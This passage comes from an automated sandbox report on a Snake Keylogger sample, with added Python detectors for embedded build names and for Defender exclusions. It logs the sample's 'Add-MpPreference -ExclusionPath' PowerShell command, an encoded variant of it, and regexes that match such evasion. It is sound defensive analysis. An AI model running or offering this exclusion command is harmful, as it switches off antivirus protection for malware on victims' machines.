Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs 299371485_14108825808_1736351479899.exe
Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2224357867.0000000009B20000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs 299371485_14108825808_1736351479899.exe
Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2216276435.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 299371485_14108825808_1736351479899.exe
Source: 299371485_14108825808_1736351479899.exe, 00000000.00000000.2167338827.0000000000342000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameHQYI.exeH vs 299371485_14108825808_1736351479899.exe
Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4630511383.0000000007319000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs 299371485_14108825808_1736351479899.exe
Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs 299371485_14108825808_1736351479899.exe
Source: 299371485_14108825808_1736351479899.exe | Binary or memory string: OriginalFilenameHQYI.exeH vs 299371485_14108825808_1736351479899.exe
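The rows above are the sandbox comparing the OriginalFilename field of every version resource it finds in memory with the name of the file on disk. The on-disk sample was built as HQYI.exe, the stage that ends up at 0x400000 in the second instance of the sample (the one the Yara rules tag as Snake Keylogger) was built as Remington.exe, and Captive.dll and Montero.dll are embedded helper assemblies; clr.dll is just the loaded .NET runtime and is expected noise. The stray trailing character (`4`, `8`, `"`, `T`, `H`) is most likely the low byte of the length field of the next version-info entry, which the sandbox's UTF-16 string extraction glues onto the value. The Python below is an added example, not Joe Sandbox code, that performs the same check on a raw memory buffer by locating the UTF-16LE `OriginalFilename` key and reading the value up to its NUL terminator, so the stray byte never appears. The dump fragment and the `_string_entry` layout helper are constructed here to mimic the entries reported above.

```python
import re
from typing import List, Tuple

# The "OriginalFilename" key of a VS_VERSIONINFO String entry, as it sits in memory (UTF-16LE).
_KEY = "OriginalFilename".encode("utf-16-le")
# Key NUL, optional 32-bit alignment padding, then printable-ASCII UTF-16LE units up to the value's NUL.
_ENTRY = re.compile(_KEY + rb"\x00\x00(?:\x00\x00)?((?:[\x20-\x7e]\x00)+)\x00\x00")


def original_filenames(buf: bytes) -> List[str]:
    """Return each OriginalFilename value in buf, stopping at the value's NUL terminator."""
    return [m.group(1).decode("utf-16-le") for m in _ENTRY.finditer(buf)]


def mismatches(buf: bytes, on_disk_name: str) -> List[Tuple[str, bool]]:
    """Pair every embedded OriginalFilename with whether it differs from the on-disk name."""
    return [(name, name.lower() != on_disk_name.lower()) for name in original_filenames(buf)]


def _string_entry(value: str, next_wlength: int) -> bytes:
    """Constructed version-info String entry: header, key, value, padding, then the next entry's header."""
    header = b"\x00\x00\x00\x00\x01\x00"  # wLength (left zero here), wValueLength, wType=1 (text)
    body = header + _KEY + b"\x00\x00" + value.encode("utf-16-le") + b"\x00\x00"
    body += b"\x00" * (-len(body) % 4)  # the real structure pads each entry to a 32-bit boundary
    # wLength of the following entry, little-endian: its low byte is the stray character in the report.
    return body + next_wlength.to_bytes(2, "little") + b"\x0a\x00\x01\x00"


# Constructed dump fragment: three entries separated by filler, mirroring values seen in the report.
SAMPLE_DUMP = (
    b"\x90" * 16 + _string_entry("Remington.exe", 0x34)
    + b"\xcc" * 8 + _string_entry("HQYI.exe", 0x48)
    + b"\x00" * 5 + _string_entry("clr.dll", 0x54)
)

if __name__ == "__main__":
    for name, differs in mismatches(SAMPLE_DUMP, "299371485_14108825808_1736351479899.exe"):
        print(f"OriginalFilename {name!r}: {'MISMATCH' if differs else 'matches on-disk name'}")
```

On a real dump, feed `mismatches()` the bytes of each region and drop names of modules you know are loaded legitimately (clr.dll, mscoree.dll and the like); what remains is the list of internal build names, which is a more stable pivot for hunting related samples than the randomized on-disk filename.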
Source: 299371485_14108825808_1736351479899.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 6240, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 299371485_14108825808_1736351479899.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, -J--.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, -J--.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, .cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, -J--.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, -J--.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, .cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, .cs | Base64 encoded string: 'IAt1Sn9WWSxyQHsKau5SKWhFtGEX/6MJmf4asP6NIqmXal3SCVqCJZYVBBPIh0Bh'
Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, .cs | Base64 encoded string: 'IAt1Sn9WWSxyQHsKau5SKWhFtGEX/6MJmf4asP6NIqmXal3SCVqCJZYVBBPIh0Bh'
Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, Ru23Huyb8mQLjC7BwH.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, Ru23Huyb8mQLjC7BwH.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, zuDh9WIx1svT8dxSDC.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, zuDh9WIx1svT8dxSDC.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, zuDh9WIx1svT8dxSDC.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, zuDh9WIx1svT8dxSDC.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, zuDh9WIx1svT8dxSDC.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, zuDh9WIx1svT8dxSDC.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, zuDh9WIx1svT8dxSDC.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, zuDh9WIx1svT8dxSDC.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, zuDh9WIx1svT8dxSDC.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, Ru23Huyb8mQLjC7BwH.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, Ru23Huyb8mQLjC7BwH.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, Ru23Huyb8mQLjC7BwH.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, Ru23Huyb8mQLjC7BwH.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/6@3/3
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\299371485_14108825808_1736351479899.exe.log
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:120:WilError_03
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Mutant created: \Sessions\1\BaseNamedObjects\hLvhfhxxgZpuoaCiTzlPTGdGpE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j20hxsiw.zge.ps1
Source: 299371485_14108825808_1736351479899.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 299371485_14108825808_1736351479899.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 299371485_14108825808_1736351479899.exe | Virustotal: Detection: 29%
Source: 299371485_14108825808_1736351479899.exe | ReversingLabs: Detection: 21%
Source: unknown | Process created: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe"
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Process created: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
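The process tree above is the whole defence-evasion step in one line: the sample spawns 32-bit powershell.exe with `Add-MpPreference -ExclusionPath` pointing at its own path, so Microsoft Defender stops scanning the dropper before it re-launches itself. The same cmdlet also arrives base64-encoded behind `-EncodedCommand` in other samples, which is what the "Powershell Base64 Encoded MpPreference Cmdlet" Sigma hit in the overview refers to. The Python below is an added detection example, not part of the Joe Sandbox report: it runs over process-creation records, decodes `-EncodedCommand` (base64 of UTF-16LE) before matching, flags `Add-MpPreference`/`Set-MpPreference` with any `-Exclusion*` parameter, and marks the case seen here where the excluded path is the parent process itself. The `Key=Value|Key=Value` record format and the three sample events are constructed for the example; the first event mirrors the command line shown in this report.

```python
import base64
import re
from typing import Dict, List, Optional

# Cmdlets that change Microsoft Defender preferences, and the parameters that add exclusions.
MP_CMDLET = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.IGNORECASE)
EXCLUSION_PARAM = re.compile(r"-Exclusion(?:Path|Process|Extension|IpAddress)\b", re.IGNORECASE)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; the payload is base64 of UTF-16LE text.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if the flag is absent or undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline: str) -> Optional[Dict]:
    """Return a finding if the command line adds Defender exclusions (plain or encoded), else None."""
    script = decode_encoded_command(cmdline)
    text = cmdline if script is None else script
    if not (MP_CMDLET.search(text) and EXCLUSION_PARAM.search(text)):
        return None
    params = sorted({m.group(0).lower() for m in EXCLUSION_PARAM.finditer(text)})
    return {"encoded": script is not None, "params": params, "script": text}


def parse_event(line: str) -> Dict[str, str]:
    """Split a constructed 'Key=Value|Key=Value' process-creation record (hypothetical log format)."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def scan(events: List[str]) -> List[Dict]:
    """Run classify() over every record and enrich hits with parent-process context."""
    findings = []
    for line in events:
        event = parse_event(line)
        finding = classify(event.get("CommandLine", ""))
        if finding is None:
            continue
        parent = event.get("ParentImage", "")
        finding["parent"] = parent
        # The sample in this report excludes its own path: the exclusion target equals the parent image.
        finding["self_exclusion"] = bool(parent) and parent.lower() in finding["script"].lower()
        findings.append(finding)
    return findings


# Constructed records: the first mirrors the process creation in this report, the second is an
# encoded variant assembled here, the third is benign administrative use that must not fire.
_ENCODED = base64.b64encode(
    'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming"'.encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    r"ParentImage=C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe"
    r"|Image=C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    r'|CommandLine="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe"',
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    f"|CommandLine=powershell.exe -NoP -W Hidden -enc {_ENCODED}",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell.exe Get-MpPreference",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{'encoded ' if f['encoded'] else ''}{', '.join(f['params'])} from {f['parent']}"
              f"{' (excludes its own parent)' if f['self_exclusion'] else ''}")
```

When a hit like this turns up, confirm on the host with `Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess, ExclusionExtension` and remove the entry with `Remove-MpPreference`; Defender also records every preference change as Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, which gives you a second source that survives command-line obfuscation.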
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
